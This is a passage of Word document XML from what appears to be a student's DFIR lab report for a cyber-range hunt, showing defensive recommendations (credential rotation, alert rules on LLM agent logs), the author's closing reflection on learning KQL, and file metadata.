                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Enforce credential rotation for all default service accounts at deployment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="2622DDB8" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0862A866" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">No alert on LLM agent logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5F4F63DE" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Agent reasoning was observable but no rule fired on it</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="781C4FB8" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Create analytics rules on LLMAgentLogs_CL for unusual actor names or high-risk tool calls</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="43A01A72" w:rsidP="40786FAC" w:rsidRDefault="43A01A72" w14:paraId="32CE6459" w14:textId="0B011D83">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="240" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Ending Thoughts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43A01A72" w:rsidP="40786FAC" w:rsidRDefault="43A01A72" w14:paraId="5E9C88BC" w14:textId="34C6CB35">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This is the first lab I have done within the cyber range, and the first time I felt like I had complete control of the steps I needed to take to be able to get all the answers needed for this attack. I appreciate how the structure of this assignment was to go through the cyber kill chain and start from looking for the initial access, all the way up to priv esc and impact. It solidified my understanding of the workflow that should be taken when doing such an event, and I can see this helping me in further labs or real world events when I eventually get a position in Cybersecurity. Throughout this assignment, which took about a week, I did have claude help me out a ton when I got stuck on some queries, and I also attempted to use the observation agent inside sentinel, which I found to be very impressive and insanely helpful. I still need to narrow down my KQL skills also overall, but I feel I have a better grip on it now, and I am able to make small changes in the query to be able to find the logs i need. This was a great learning opportunity and look forward to doing more labs within the cyber range!</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40786FAC" w14:paraId="05172F92" wp14:textId="259ADAF7">
    <w:pPr>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:lang w:val="en-US"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="40786FAC" w:rsidR="40786FAC">
      <w:rPr>
        <w:color w:val="666666"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t xml:space="preserve"> LAW-</w:t>
    </w:r>
    <w:r w:rsidRPr="40786FAC" w:rsidR="40786FAC">
      <w:rPr>
        <w:color w:val="666666"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t>HuntPractice</w:t>
    </w:r>
    <w:r w:rsidRPr="40786FAC" w:rsidR="40786FAC">
      <w:rPr>
        <w:color w:val="666666"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t xml:space="preserve">  |  2026-07-</w:t>
    </w:r>
    <w:r w:rsidRPr="40786FAC" w:rsidR="40786FAC">
      <w:rPr>
        <w:color w:val="666666"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t>30  |</w:t>
    </w:r>
    <w:r w:rsidRPr="40786FAC" w:rsidR="40786FAC">
      <w:rPr>
        <w:color w:val="666666"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t xml:space="preserve">  Page </w:t>
    </w:r>
    <w:r w:rsidRPr="40786FAC">
      <w:rPr>
        <w:color w:val="666666"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidRPr="40786FAC">
      <w:rPr>
        <w:color w:val="666666"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:instrText xml:space="preserve">PAGE</w:instrText>
    </w:r>
    <w:r w:rsidRPr="40786FAC">
      <w:rPr>
        <w:color w:val="666666"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidRPr="40786FAC">
      <w:rPr>
        <w:color w:val="666666"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r w:rsidRPr="40786FAC" w:rsidR="40786FAC">
      <w:rPr>
        <w:color w:val="666666"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t xml:space="preserve"> of </w:t>
    </w:r>
    <w:r w:rsidRPr="40786FAC">
      <w:rPr>
        <w:color w:val="666666"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidRPr="40786FAC">
      <w:rPr>
        <w:color w:val="666666"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:instrText xml:space="preserve">NUMPAGES</w:instrText>
    </w:r>
    <w:r w:rsidRPr="40786FAC">
      <w:rPr>
        <w:color w:val="666666"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidRPr="40786FAC">
      <w:rPr>
        <w:color w:val="666666"/>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sidR="40786FAC" w:rsidP="40786FAC" w:rsidRDefault="40786FAC" w14:paraId="455D9806" w14:textId="385E6879">
    <w:pPr>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:r w:rsidRPr="40786FAC" w:rsidR="40786FAC">
      <w:rPr>
        <w:i w:val="1"/>
        <w:iCs w:val="1"/>
        <w:color w:val="666666"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t xml:space="preserve">HUNT 23 — </w:t>
    </w:r>
    <w:r w:rsidRPr="40786FAC" w:rsidR="40786FAC">
      <w:rPr>
        <w:i w:val="1"/>
        <w:iCs w:val="1"/>
        <w:color w:val="666666"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t>JADEPUFFER  |</w:t>
    </w:r>
    <w:r w:rsidRPr="40786FAC" w:rsidR="40786FAC">
      <w:rPr>
        <w:i w:val="1"/>
        <w:iCs w:val="1"/>
        <w:color w:val="666666"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t xml:space="preserve">  DFIR INCIDENT REPORT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2e7985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75A7618"/>
  <w15:docId w15:val="{25A25669-692F-4692-8626-4BC18205D36C}"/>
  <w:rsids>
    <w:rsidRoot w:val="0014DF23"/>
    <w:rsid w:val="0014DF23"/>
    <w:rsid w:val="0020CCEF"/>
    <w:rsid w:val="00828473"/>
    <w:rsid w:val="00D21FD0"/>
    <w:rsid w:val="012C0DCB"/>
    <w:rsid w:val="013071B3"/>
    <w:rsid w:val="019D85F0"/>
    <w:rsid w:val="0297AE27"/>
    <w:rsid w:val="02BABDFD"/>
    <w:rsid w:val="02C4133F"/>
    <w:rsid w:val="02CC8EB4"/>
    <w:rsid w:val="0329F0D4"/>
    <w:rsid w:val="03813249"/>
    <w:rsid w:val="04325270"/>
    <w:rsid w:val="043DEFD2"/>
    <w:rsid w:val="043E0385"/>
    <w:rsid w:val="04516FC8"/>
    <w:rsid w:val="04E64052"/>
    <w:rsid w:val="04F59F63"/>
    <w:rsid w:val="05710B8F"/>
    <w:rsid w:val="05AF27ED"/>
    <w:rsid w:val="05B89625"/>
    <w:rsid w:val="05BB20B6"/>
    <w:rsid w:val="05BB20B6"/>
    <w:rsid w:val="063537AF"/>
    <w:rsid w:val="0675052B"/>
    <w:rsid w:val="0683FEAA"/>
    <w:rsid w:val="06C3F640"/>
    <w:rsid w:val="06D18435"/>
    <w:rsid w:val="06E3E21C"/>
    <w:rsid w:val="06E9D794"/>
    <w:rsid w:val="06E9D794"/>
    <w:rsid w:val="0727716B"/>
    <w:rsid w:val="0756C7B0"/>
    <w:rsid w:val="08329149"/>
    <w:rsid w:val="08716D69"/>
    <w:rsid w:val="088FA448"/>
    <w:rsid w:val="09045354"/>
    <w:rsid w:val="09198A87"/>
    <w:rsid w:val="09627E8D"/>
    <w:rsid w:val="09908CE3"/>
    <w:rsid w:val="09908CE3"/>
    <w:rsid w:val="09BBE4BB"/>
    <w:rsid w:val="09F61D0F"/>
    <w:rsid w:val="0A482EC2"/>
    <w:rsid w:val="0A4B583E"/>
    <w:rsid w:val="0A6F52B6"/>
    <w:rsid w:val="0AAD6D54"/>
    <w:rsid w:val="0AEFFFA5"/>
    <w:rsid w:val="0B5F272C"/>
    <w:rsid w:val="0B69C8DB"/>
    <w:rsid w:val="0BD40503"/>
    <w:rsid w:val="0C335D42"/>
    <w:rsid w:val="0C4ED301"/>
    <w:rsid w:val="0CBC5249"/>
    <w:rsid w:val="0DA26917"/>
    <w:rsid w:val="0DE601EE"/>
    <w:rsid w:val="0E64CC3F"/>
    <w:rsid w:val="1011CAF3"/>
    <w:rsid w:val="102D7EA0"/>
    <w:rsid w:val="106881C3"/>
    <w:rsid w:val="1094207A"/>
    <w:rsid w:val="1094207A"/>
    <w:rsid w:val="11738926"/>
    <w:rsid w:val="119F6D29"/>
    <w:rsid w:val="119F6D29"/>
    <w:rsid w:val="11B03066"/>
    <w:rsid w:val="11E2CCB2"/>
    <w:rsid w:val="11E89E1A"/>
    <w:rsid w:val="11F5B07F"/>
    <w:rsid w:val="12123E13"/>
    <w:rsid w:val="12669767"/>
    <w:rsid w:val="12753EAD"/>
    <w:rsid w:val="12753EAD"/>
    <w:rsid w:val="133C254E"/>
    <w:rsid w:val="1356C659"/>
    <w:rsid w:val="1356C659"/>
    <w:rsid w:val="1366679E"/>
    <w:rsid w:val="1420F7EB"/>
    <w:rsid w:val="1500CDAD"/>
    <w:rsid w:val="150FCD84"/>
    <w:rsid w:val="155BCD44"/>
    <w:rsid w:val="15EDD327"/>
    <w:rsid w:val="162171F3"/>
    <w:rsid w:val="16379821"/>
    <w:rsid w:val="1749829D"/>
    <w:rsid w:val="182A9222"/>
    <w:rsid w:val="1841C295"/>
    <w:rsid w:val="1899ABA1"/>
    <w:rsid w:val="18E7398C"/>
    <w:rsid w:val="19761ED8"/>
    <w:rsid w:val="1A1DE113"/>
    <w:rsid w:val="1A305197"/>
    <w:rsid w:val="1A71A5E2"/>
    <w:rsid w:val="1A71A5E2"/>
    <w:rsid w:val="1ABBA638"/>
    <w:rsid w:val="1B1EBFAA"/>
    <w:rsid w:val="1B4D63A9"/>
    <w:rsid w:val="1BFEB7A8"/>
    <w:rsid w:val="1C1A1F7C"/>
    <w:rsid w:val="1C4EC89E"/>
    <w:rsid w:val="1C96BB71"/>
    <w:rsid w:val="1C9C61AF"/>
    <w:rsid w:val="1CB0FCAE"/>
    <w:rsid w:val="1CB28526"/>
    <w:rsid w:val="1CC0A249"/>
    <w:rsid w:val="1D0D609E"/>
    <w:rsid w:val="1D18B8DA"/>
    <w:rsid w:val="1D499725"/>
    <w:rsid w:val="1D86A1DA"/>
    <w:rsid w:val="1DBB7144"/>
    <w:rsid w:val="1DD316DB"/>
    <w:rsid w:val="1E570A4E"/>
    <w:rsid w:val="1E6EBB66"/>
    <w:rsid w:val="1E9D8D21"/>
    <w:rsid w:val="1F28CE54"/>
    <w:rsid w:val="1F2A43AB"/>
    <w:rsid w:val="1F2A43AB"/>
    <w:rsid w:val="1FE3EF51"/>
    <w:rsid w:val="1FF8687E"/>
    <w:rsid w:val="20612A7E"/>
    <w:rsid w:val="219C0AB3"/>
    <w:rsid w:val="21D89B8F"/>
    <w:rsid w:val="2243A60F"/>
    <w:rsid w:val="227852EE"/>
    <w:rsid w:val="22830B8E"/>
    <w:rsid w:val="2330BA66"/>
    <w:rsid w:val="23A2055B"/>
    <w:rsid w:val="24699536"/>
    <w:rsid w:val="25054D04"/>
    <w:rsid w:val="264CD679"/>
    <w:rsid w:val="26567BD2"/>
    <w:rsid w:val="270D9821"/>
    <w:rsid w:val="275738FB"/>
    <w:rsid w:val="27C1ECD5"/>
    <w:rsid w:val="28BC0F20"/>
    <w:rsid w:val="28DDC4AC"/>
    <w:rsid w:val="290F7E32"/>
    <w:rsid w:val="290F7E32"/>
    <w:rsid w:val="292B0E22"/>
    <w:rsid w:val="29FA9A3F"/>
    <w:rsid w:val="2A04897E"/>
    <w:rsid w:val="2A2B9A3F"/>
    <w:rsid w:val="2ACACCA4"/>
    <w:rsid w:val="2ACF9FE2"/>
    <w:rsid w:val="2B2CAF00"/>
    <w:rsid w:val="2B56D277"/>
    <w:rsid w:val="2C01C7BA"/>
    <w:rsid w:val="2C71E010"/>
    <w:rsid w:val="2C797C62"/>
    <w:rsid w:val="2CF37093"/>
    <w:rsid w:val="2D363CA6"/>
    <w:rsid w:val="2D652EA0"/>
    <w:rsid w:val="2DA6FB15"/>
    <w:rsid w:val="2DB180D5"/>
    <w:rsid w:val="2DC78BB8"/>
    <w:rsid w:val="2E7A76C4"/>
    <w:rsid w:val="2EBCFE84"/>
    <w:rsid w:val="2F320021"/>
    <w:rsid w:val="2F6702B4"/>
    <w:rsid w:val="311670C5"/>
    <w:rsid w:val="31BC7FBC"/>
    <w:rsid w:val="32061687"/>
    <w:rsid w:val="32487F24"/>
    <w:rsid w:val="330523F2"/>
    <w:rsid w:val="332AAAC7"/>
    <w:rsid w:val="33717E98"/>
    <w:rsid w:val="33717E98"/>
    <w:rsid w:val="33971C77"/>
    <w:rsid w:val="34F09D6B"/>
    <w:rsid w:val="34F09D6B"/>
    <w:rsid w:val="355CFE9E"/>
    <w:rsid w:val="355F68B7"/>
    <w:rsid w:val="35A4287D"/>
    <w:rsid w:val="35DE86DC"/>
    <w:rsid w:val="36BC92B5"/>
    <w:rsid w:val="36EB345F"/>
    <w:rsid w:val="373E8F31"/>
    <w:rsid w:val="37A32C10"/>
    <w:rsid w:val="37C1DB8D"/>
    <w:rsid w:val="384400C9"/>
    <w:rsid w:val="386454AF"/>
    <w:rsid w:val="389877BF"/>
    <w:rsid w:val="38A8A0D6"/>
    <w:rsid w:val="39816569"/>
    <w:rsid w:val="3A0565CB"/>
    <w:rsid w:val="3A0E7155"/>
    <w:rsid w:val="3A61A135"/>
    <w:rsid w:val="3AC8BEC2"/>
    <w:rsid w:val="3B2CA69D"/>
    <w:rsid w:val="3B2CA69D"/>
    <w:rsid w:val="3BE246CE"/>
    <w:rsid w:val="3C09A880"/>
    <w:rsid w:val="3CFE5000"/>
    <w:rsid w:val="3D097DD7"/>
    <w:rsid w:val="3DA2D510"/>
    <w:rsid w:val="3DF2A501"/>
    <w:rsid w:val="3F92DC9B"/>
    <w:rsid w:val="4025F35C"/>
    <w:rsid w:val="40786FAC"/>
    <w:rsid w:val="40FC73FE"/>
    <w:rsid w:val="41725107"/>
    <w:rsid w:val="419BFB8A"/>
    <w:rsid w:val="42D6FDCA"/>
    <w:rsid w:val="42D6FDCA"/>
    <w:rsid w:val="42E57F98"/>
    <w:rsid w:val="4307726A"/>
    <w:rsid w:val="4319AF4D"/>
    <w:rsid w:val="43817DE7"/>
    <w:rsid w:val="43817DE7"/>
    <w:rsid w:val="43A01A72"/>
    <w:rsid w:val="43E4E8E7"/>
    <w:rsid w:val="441843D2"/>
    <w:rsid w:val="444F4623"/>
    <w:rsid w:val="44807AD9"/>
    <w:rsid w:val="44807AD9"/>
    <w:rsid w:val="44BDBCFF"/>
    <w:rsid w:val="44BEF332"/>
    <w:rsid w:val="44E4F82D"/>
    <w:rsid w:val="460F056F"/>
    <w:rsid w:val="465CEE2A"/>
    <w:rsid w:val="465CEE2A"/>
    <w:rsid w:val="46842B5A"/>
    <w:rsid w:val="46D34262"/>
    <w:rsid w:val="46EBEC77"/>
    <w:rsid w:val="4718DECD"/>
    <w:rsid w:val="47338D1D"/>
    <w:rsid w:val="47E69CBA"/>
    <w:rsid w:val="47EFF269"/>
    <w:rsid w:val="482C3C66"/>
    <w:rsid w:val="48419794"/>
    <w:rsid w:val="4972E1A5"/>
    <w:rsid w:val="4972E1A5"/>
    <w:rsid w:val="49798647"/>
    <w:rsid w:val="49B813A2"/>
    <w:rsid w:val="4A11C47C"/>
    <w:rsid w:val="4A27CFDF"/>
    <w:rsid w:val="4A412EBF"/>
    <w:rsid w:val="4A536C16"/>
    <w:rsid w:val="4A82C8FA"/>
    <w:rsid w:val="4B6A5895"/>
    <w:rsid w:val="4BFFD913"/>
    <w:rsid w:val="4C05293F"/>
    <w:rsid w:val="4C13F542"/>
    <w:rsid w:val="4D02CB22"/>
    <w:rsid w:val="4DA795C7"/>
    <w:rsid w:val="4DD11F59"/>
    <w:rsid w:val="4E9B1134"/>
    <w:rsid w:val="4EA63A3F"/>
    <w:rsid w:val="4F0DD742"/>
    <w:rsid w:val="508739BE"/>
    <w:rsid w:val="50DF1144"/>
    <w:rsid w:val="50EC2837"/>
    <w:rsid w:val="511D9242"/>
    <w:rsid w:val="5124318F"/>
    <w:rsid w:val="516C110E"/>
    <w:rsid w:val="5189290B"/>
    <w:rsid w:val="5214D769"/>
    <w:rsid w:val="52918BD9"/>
    <w:rsid w:val="52F37C02"/>
    <w:rsid w:val="53203C43"/>
    <w:rsid w:val="536C3C3B"/>
    <w:rsid w:val="53779239"/>
    <w:rsid w:val="53EA8ECB"/>
    <w:rsid w:val="5420F5EF"/>
    <w:rsid w:val="544317D2"/>
    <w:rsid w:val="544BF947"/>
    <w:rsid w:val="5455CC60"/>
    <w:rsid w:val="5455CC60"/>
    <w:rsid w:val="546B1EC8"/>
    <w:rsid w:val="5529764D"/>
    <w:rsid w:val="55617BA0"/>
    <w:rsid w:val="558C7282"/>
    <w:rsid w:val="55B37F86"/>
    <w:rsid w:val="55B37F86"/>
    <w:rsid w:val="55BF6DA5"/>
    <w:rsid w:val="55CE5022"/>
    <w:rsid w:val="56BFD84C"/>
    <w:rsid w:val="56C2CC54"/>
    <w:rsid w:val="56FAB794"/>
    <w:rsid w:val="580D3087"/>
    <w:rsid w:val="583D0E1C"/>
    <w:rsid w:val="5898A89A"/>
    <w:rsid w:val="58F214C7"/>
    <w:rsid w:val="599B142B"/>
    <w:rsid w:val="599F4CF3"/>
    <w:rsid w:val="59A2564B"/>
    <w:rsid w:val="59A7EF84"/>
    <w:rsid w:val="5A1BE931"/>
    <w:rsid w:val="5A8F5F76"/>
    <w:rsid w:val="5A9532F5"/>
    <w:rsid w:val="5AAEE19E"/>
    <w:rsid w:val="5B423BF6"/>
    <w:rsid w:val="5BBF4CD9"/>
    <w:rsid w:val="5BDEA1A4"/>
    <w:rsid w:val="5BFAD059"/>
    <w:rsid w:val="5D8D90CB"/>
    <w:rsid w:val="5D8D90CB"/>
    <w:rsid w:val="5E115024"/>
    <w:rsid w:val="5E240583"/>
    <w:rsid w:val="5E7DB28B"/>
    <w:rsid w:val="5FA6AB12"/>
    <w:rsid w:val="602BD7FA"/>
    <w:rsid w:val="60DCCF83"/>
    <w:rsid w:val="612C7BD9"/>
    <w:rsid w:val="6133AAAA"/>
    <w:rsid w:val="61487355"/>
    <w:rsid w:val="616525A4"/>
    <w:rsid w:val="61933AD7"/>
    <w:rsid w:val="61E12622"/>
    <w:rsid w:val="626DCADB"/>
    <w:rsid w:val="632FEACB"/>
    <w:rsid w:val="632FEACB"/>
    <w:rsid w:val="63B91C53"/>
    <w:rsid w:val="63DB86D6"/>
    <w:rsid w:val="63DB86D6"/>
    <w:rsid w:val="643212AC"/>
    <w:rsid w:val="648AD8AF"/>
    <w:rsid w:val="663CD1E3"/>
    <w:rsid w:val="664CEB36"/>
    <w:rsid w:val="67597F1A"/>
    <w:rsid w:val="675F374A"/>
    <w:rsid w:val="6770D3CC"/>
    <w:rsid w:val="677A4ABD"/>
    <w:rsid w:val="677F2435"/>
    <w:rsid w:val="67852857"/>
    <w:rsid w:val="6799D57C"/>
    <w:rsid w:val="67B2FE0B"/>
    <w:rsid w:val="67B7DB5F"/>
    <w:rsid w:val="6827D3F0"/>
    <w:rsid w:val="6827D3F0"/>
    <w:rsid w:val="6868E396"/>
    <w:rsid w:val="68D52EFF"/>
    <w:rsid w:val="697AF7A5"/>
    <w:rsid w:val="69C576D6"/>
    <w:rsid w:val="6AEB088C"/>
    <w:rsid w:val="6B02A6BE"/>
    <w:rsid w:val="6B44E473"/>
    <w:rsid w:val="6B6C9EA5"/>
    <w:rsid w:val="6BABB26A"/>
    <w:rsid w:val="6BBF7C87"/>
    <w:rsid w:val="6BF42126"/>
    <w:rsid w:val="6C227382"/>
    <w:rsid w:val="6C631230"/>
    <w:rsid w:val="6DB01F04"/>
    <w:rsid w:val="6DF0D72D"/>
    <w:rsid w:val="6E14A6A9"/>
    <w:rsid w:val="6E237216"/>
    <w:rsid w:val="7030305D"/>
    <w:rsid w:val="7034CC0C"/>
    <w:rsid w:val="7050DAF0"/>
    <w:rsid w:val="70C3D631"/>
    <w:rsid w:val="70E58163"/>
    <w:rsid w:val="71304FDF"/>
    <w:rsid w:val="714AC920"/>
    <w:rsid w:val="7172ECBA"/>
    <w:rsid w:val="71C25EE2"/>
    <w:rsid w:val="71F5BE5C"/>
    <w:rsid w:val="7241AD4D"/>
    <w:rsid w:val="724940AD"/>
    <w:rsid w:val="726B3577"/>
    <w:rsid w:val="726D701E"/>
    <w:rsid w:val="72A01D8A"/>
    <w:rsid w:val="72D93227"/>
    <w:rsid w:val="746F483E"/>
    <w:rsid w:val="749009F9"/>
    <w:rsid w:val="75C3C3B1"/>
    <w:rsid w:val="75C87D46"/>
    <w:rsid w:val="75DB53B2"/>
    <w:rsid w:val="7604EAEF"/>
    <w:rsid w:val="7604EAEF"/>
    <w:rsid w:val="775EF307"/>
    <w:rsid w:val="77A18011"/>
    <w:rsid w:val="77DDEEDC"/>
    <w:rsid w:val="77E31384"/>
    <w:rsid w:val="77E31384"/>
    <w:rsid w:val="790B1159"/>
    <w:rsid w:val="7939E413"/>
    <w:rsid w:val="79A08338"/>
    <w:rsid w:val="79A08338"/>
    <w:rsid w:val="79B7862F"/>
    <w:rsid w:val="79D94231"/>
    <w:rsid w:val="79F324EF"/>
    <w:rsid w:val="7A3B0E12"/>
    <w:rsid w:val="7A63BD35"/>
    <w:rsid w:val="7B06C883"/>
    <w:rsid w:val="7B184592"/>
    <w:rsid w:val="7B27A31B"/>
    <w:rsid w:val="7B700AF5"/>
    <w:rsid w:val="7BB5B53B"/>
    <w:rsid w:val="7C33E367"/>
    <w:rsid w:val="7C3D9390"/>
    <w:rsid w:val="7D5CCD15"/>
    <w:rsid w:val="7D783257"/>
    <w:rsid w:val="7D87F1CE"/>
    <w:rsid w:val="7D9B6712"/>
    <w:rsid w:val="7DE0E9C5"/>
    <w:rsid w:val="7E5F50F2"/>
    <w:rsid w:val="7E85DAD2"/>
    <w:rsid w:val="7E9F76EB"/>
    <w:rsid w:val="7EEABA3F"/>
    <w:rsid w:val="7F470660"/>
    <w:rsid w:val="7F470660"/>
    <w:rsid w:val="7FAE945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image" Target="/media/image.png" Id="rId1396323131" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image2.png" Id="rId630523971" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image3.png" Id="rId1848019097" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image4.png" Id="rId1159717384" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image5.png" Id="rId301027395" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image6.png" Id="rId51187214" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image7.png" Id="rId520329635" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image8.png" Id="rId1897788133" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image9.png" Id="rId1674728055" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagea.png" Id="rId945191848" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imageb.png" Id="rId82417159" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagec.png" Id="rId857790051" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imaged.png" Id="rId1094478936" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagee.png" Id="rId410964985" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagef.png" Id="rId1699632257" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image10.png" Id="rId1691101223" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image11.png" Id="rId1270642843"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Giancarlos Figueroa</lastModifiedBy>
  <revision>2</revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-09-17T21:46:57.1460000Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-18T22:28:08.8517941Z</dcterms:modified>
</coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>